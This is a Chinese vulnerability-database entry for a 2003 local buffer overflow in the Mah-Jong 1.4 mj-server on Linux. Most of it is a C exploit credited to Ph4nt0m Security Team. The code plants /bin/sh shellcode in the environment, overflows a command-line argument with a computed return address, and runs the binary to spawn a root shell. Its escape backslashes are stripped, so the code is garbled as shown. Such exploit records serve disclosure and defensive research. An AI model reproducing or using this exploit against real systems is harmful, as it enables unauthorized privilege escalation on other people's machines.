Mah-Jong 1.4 – MJ-Player Server Flag Local Buffer Overflow
漏洞ID | 1054194 | 漏洞类型 | |
发布时间 | 2003-09-29 | 更新时间 | 2003-09-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8729/info
A problem in the handling of large requests supplied with certain flags has been reported in Maj-Jong. Because of this, it may be possible for a local attacker to gain elevated privileges.
/*
* mj-server(client) local root(possible in debian) exploit
* test in (redhat7.2----redhat8.0)
* coded by jsk
*
* (c) Ph4nt0m Security Team /www.ph4nt0m.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFSIZE 150
char shellcode[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x31xc0x31xdbxb0x17xcdx80xebx1fx5ex89x76x08x31"
"xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8d"
"x56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxff"
"xffx2fx62x69x6ex2fx73x68x58";
void banner (void);
void banner (void)
{
fprintf (stdout, "n [+] mj-server local exploit
mail:<[email protected]>");
fprintf (stdout, "n [+] by jsk < <a href="http://www.ph4nt0m.org"
target="_blank"><a href="http://www.ph4nt0m.org"
target="_blank">www.ph4nt0m.org</a></a>> talk with me <irc.0x557.org
#ph4nt0m> ");
fprintf (stdout, "n [+] spawning shell nn");
}
int main(void)
{
char buf[BUFSIZE+16];
char *prog[] = {"/home/mj-1.4-src/mj-server","--server", buf, NULL};
char *env[] = {"HOME=jsk", shellcode, NULL};
unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) -
strlen(shellcode) - 0x02;
memset(buf,0x41,sizeof(buf));
memcpy(buf+BUFSIZE,(char *)&ret,4);
memcpy(buf+BUFSIZE+4,(char *)&ret,4);
memcpy(buf+BUFSIZE+8,(char *)&ret,4);
buf[BUFSIZE+12] = 0x00;
printf("n [+] Using address: 0x%x", ret);
banner ();
execve(prog[0],prog,env);
return 0;
}
相关推荐: SWS Simple Web Server Non-existent File Request Denial Of Service Vulnerability
SWS Simple Web Server Non-existent File Request Denial Of Service Vulnerability 漏洞ID 1101588 漏洞类型 Design Error 发布时间 2002-09-05 更新时…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666